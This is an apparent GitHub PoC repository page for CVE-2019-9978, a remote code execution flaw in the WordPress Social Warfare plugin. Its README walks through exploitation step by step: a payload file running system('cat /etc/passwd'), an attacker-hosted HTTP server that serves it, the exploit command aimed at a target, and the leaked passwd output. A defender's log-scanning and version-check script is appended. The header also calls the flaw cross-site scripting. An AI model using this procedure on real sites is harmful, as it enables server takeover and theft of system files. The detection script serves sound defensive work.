POC details: a4a776f2b4c8bfed09a49f95c6f3cb19237a9666

Source
Related vulnerability
Title: WordPress social-warfare plugin cross-site scripting vulnerability (CVE-2019-9978)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports hosting personal blog sites on servers running PHP and MySQL. The social-warfare plugin is a social-sharing plugin used with it. Versions of the WordPress social-warfare plugin before 3.5.3 contain a cross-site scripting vulnerability. A remote attacker can exploit it via the 'swp_url' parameter to inject malicious JavaScript.
Description
A Remote Code Execution (RCE) vulnerability in the Social Warfare plugin for WordPress, affecting versions below 3.5.3.
Introduction
# CVE-2019-9978 - Social Warfare WordPress Plugin RCE < 3.5.3

A Remote Code Execution (RCE) vulnerability in the **Social Warfare** plugin for WordPress, affecting all versions below **3.5.3**.

---

## 💡 Motivation

The original public exploit was written in an outdated version of Python and no longer runs properly in modern environments.  
I rewrote the exploit to be fully compatible with **Python 3**, making it easier to use, understand, and integrate into modern tooling.

---

## Proof of Concept (PoC)

### ✅ Step 1 – Create the Payload

Create a file named `payload.txt` with the following content:

```html
<pre>system('cat /etc/passwd')</pre>
```

---

### ✅ Step 2 – Start a Python HTTP Server

Use Python to serve your payload:

```bash
python3 -m http.server 8000
```

This will make your `payload.txt` accessible at:

```
http://<your-ip>:8000/payload.txt
```

---

### ✅ Step 3 – Run the Exploit

```bash
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt
```

---

### Expected Output

If the target is vulnerable, you will receive output similar to:

```
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```
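A defender's complement to the procedure above, added here and not part of the original repository: it scans combined-format web server access log lines for requests whose `swp_url` parameter points at a host other than the site itself (the remote payload fetch the PoC depends on) and checks whether a reported plugin version is below the fixed 3.5.3. The log lines, hostnames and addresses are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def external_swp_url(path, site_host):
    """Return the off-site URL carried in ``swp_url`` if ``path`` has one, else None.

    parse_qs already percent-decodes the value, so the hostname check runs on
    the decoded URL the plugin would fetch."""
    query = urlsplit(path).query
    for value in parse_qs(query).get("swp_url", []):
        target = urlsplit(value)
        if target.scheme in ("http", "https") and target.hostname \
                and target.hostname.lower() != site_host.lower():
            return value
    return None


def find_suspicious(lines, site_host):
    """Return (client_ip, timestamp, status, remote_url) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:            # skip lines that are not in combined format
            continue
        ip, ts, _method, path, status = m.groups()
        remote = external_swp_url(path, site_host)
        if remote:
            hits.append((ip, ts, int(status), remote))
    return hits


def is_affected_version(version):
    """True when the installed Social Warfare version is below the fixed 3.5.3."""
    return tuple(int(p) for p in version.split(".")) < (3, 5, 3)


# Constructed sample log lines (not real traffic); the first mirrors the
# remote payload fetch in the PoC above, the third is an on-site swp_url.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Apr/2019:10:01:02 +0000] "GET /wordpress/?swp_url=http%3A%2F%2F198.51.100.7%3A8000%2Fpayload.txt HTTP/1.1" 200 5120',
    '198.51.100.20 - - [10/Apr/2019:10:01:05 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 8821',
    '203.0.113.9 - - [10/Apr/2019:10:02:10 +0000] "GET /wordpress/?swp_url=https%3A%2F%2Fblog.example.org%2Fpost HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG, "blog.example.org"):
        print("[!] possible CVE-2019-9978 probe:", hit)
    print("3.5.2 affected:", is_affected_version("3.5.2"))
```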

---

## Screenshots


### HTTP Server Receives Request

![http-server](https://github.com/user-attachments/assets/29c63c20-48dc-49f9-ae5d-9fc3aedcde8f)


### Successful Exploit Execution

![exploit](https://github.com/user-attachments/assets/209fb5a8-4737-4bf9-8700-fc169e1a7833)
### Payload File Content

![payload](https://github.com/user-attachments/assets/24293c44-b3b9-4891-a2d9-25bb8612ac5b)
---

## Technical Details

- **Plugin:** Social Warfare
- **Affected Versions:** `< 3.5.3`
- **CVE:** [CVE-2019-9978](https://www.exploit-db.com/exploits/46794)
- **Vulnerability Type:** Remote Code Execution (RCE)
- **Original Author:** [@hash3liZer](https://github.com/hash3liZer/CVE-2019-9978)
- **Researcher:** Luka Sikic

---

## Credits

- **Exploit Author:** [@hash3liZer](https://github.com/hash3liZer)  
- **Python 3 Rework:** [@echosso](https://www.linkedin.com/in/oussama-larhnimi-8a1a01b8/) 
---

> ⚠️ **Disclaimer**: This repository is for educational and ethical testing purposes only.  
> Unauthorized use of this exploit against systems you do not own is strictly prohibited.
File snapshot

```
[4.0K] /data/pocs/a4a776f2b4c8bfed09a49f95c6f3cb19237a9666
├── [2.0K] CVE-2019-9978.py
├── [ 11K] LICENSE
├── [  37] payload.txt
└── [2.4K] README.md

0 directories, 4 files
```